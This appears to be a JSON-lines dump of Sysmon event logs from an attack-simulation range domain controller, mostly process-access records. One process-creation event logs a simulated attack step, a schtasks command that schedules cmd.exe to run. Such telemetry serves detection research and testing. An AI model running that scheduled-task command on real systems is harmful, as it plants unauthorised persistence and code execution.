{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5733,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.244\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.244","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5734,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.244\r\nSourceProcessGUID: {E2A3D6B1-11D6-5F25-0000-00106A320800}\r\nSourceProcessId: 4848\r\nSourceThreadId: 1100\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-0010355A0800}\r\nTargetProcessId: 4292\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1F3FFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFF448A0BC3)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.244","SourceProcessGUID":"{E2A3D6B1-11D6-5F25-0000-00106A320800}","SourceProcessId":"4848","SourceThreadId":"1100","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-0010355A0800}","TargetProcessId":"4292","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1f3fff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFF448A0BC3)","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5735,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.244\r\nSourceProcessGUID: {E2A3D6B1-11D4-5F25-0000-00100D0C0800}\r\nSourceProcessId: 796\r\nSourceThreadId: 2504\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D7-5F25-0000-0010355A0800}\r\nTargetProcessId: 4292\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.244","SourceProcessGUID":"{E2A3D6B1-11D4-5F25-0000-00100D0C0800}","SourceProcessId":"796","SourceThreadId":"2504","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D7-5F25-0000-0010355A0800}","TargetProcessId":"4292","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5736,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.254\r\nProcessGuid: {E2A3D6B1-11D7-5F25-0000-0010FF5A0800}\r\nProcessId: 4800\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sctasks.exe\r\nCommandLine: SCHTASKS  /Create /SC ONCE /TN spawn /TR C:\\windows\\system32\\cmd.exe /ST 20:10 \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D4-5F25-0000-00205F0B0800}\r\nLogonId: 0x80B5F\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F\r\nParentProcessGuid: {E2A3D6B1-11D7-5F25-0000-0010355A0800}\r\nParentProcessId: 4292\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \"C:\\Windows\\system32\\cmd.exe\" /c \"SCHTASKS /Create /SC ONCE /TN spawn /TR C:\\windows\\system32\\cmd.exe /ST 20:10\" ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.254","ProcessGuid":"{E2A3D6B1-11D7-5F25-0000-0010FF5A0800}","Image":"C:\\Windows\\System32\\schtasks.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Task Scheduler Configuration Tool","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"sctasks.exe","CommandLine":"SCHTASKS  /Create /SC ONCE /TN spawn /TR C:\\windows\\system32\\cmd.exe /ST 20:10 ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D4-5F25-0000-00205F0B0800}","LogonId":"0x80b5f","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F","ParentProcessGuid":"{E2A3D6B1-11D7-5F25-0000-0010355A0800}","ParentProcessId":"4292","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"SCHTASKS /Create /SC ONCE /TN spawn /TR C:\\windows\\system32\\cmd.exe /ST 20:10\" ","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5737,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.244\r\nSourceProcessGUID: {E2A3D6B1-11D7-5F25-0000-0010355A0800}\r\nSourceProcessId: 4292\r\nSourceThreadId: 4300\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-11C5-5F25-0000-0010A7FB0600}\r\nTargetProcessId: 4800\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.244","SourceProcessGUID":"{E2A3D6B1-11D7-5F25-0000-0010355A0800}","SourceProcessId":"4292","SourceThreadId":"4300","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-11C5-5F25-0000-0010A7FB0600}","TargetProcessId":"4800","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5738,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.244\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11C5-5F25-0000-0010A7FB0600}\r\nTargetProcessId: 4800\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.244","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11C5-5F25-0000-0010A7FB0600}","TargetProcessId":"4800","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5739,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.244\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.244","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5740,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.244\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.244","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5741,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:19.244\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:19.244","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
